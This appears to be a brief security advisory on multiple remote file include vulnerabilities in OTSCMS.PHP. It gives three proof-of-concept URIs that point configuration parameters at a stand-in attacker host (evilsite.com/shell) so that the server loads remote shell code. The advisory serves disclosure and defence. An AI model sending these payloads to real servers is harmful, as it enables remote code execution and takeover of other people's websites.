OTSCMS OTSCMS.PHP Multiple Remote File Include Vulnerabilities

OTSCMS OTSCMS.PHP Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue via a web client.

The following proof-of-concept URIs demonstrate these vulnerabilities:

http://www.example.com/[path]/OTSCMS.php?GLOBALS[config][directories][classes]=http://evilsite.com/shell?
http://www.example.com/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=http://evilsite.com/shell?
http://www.example.com/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][includes]=http://evilsite.com/shell?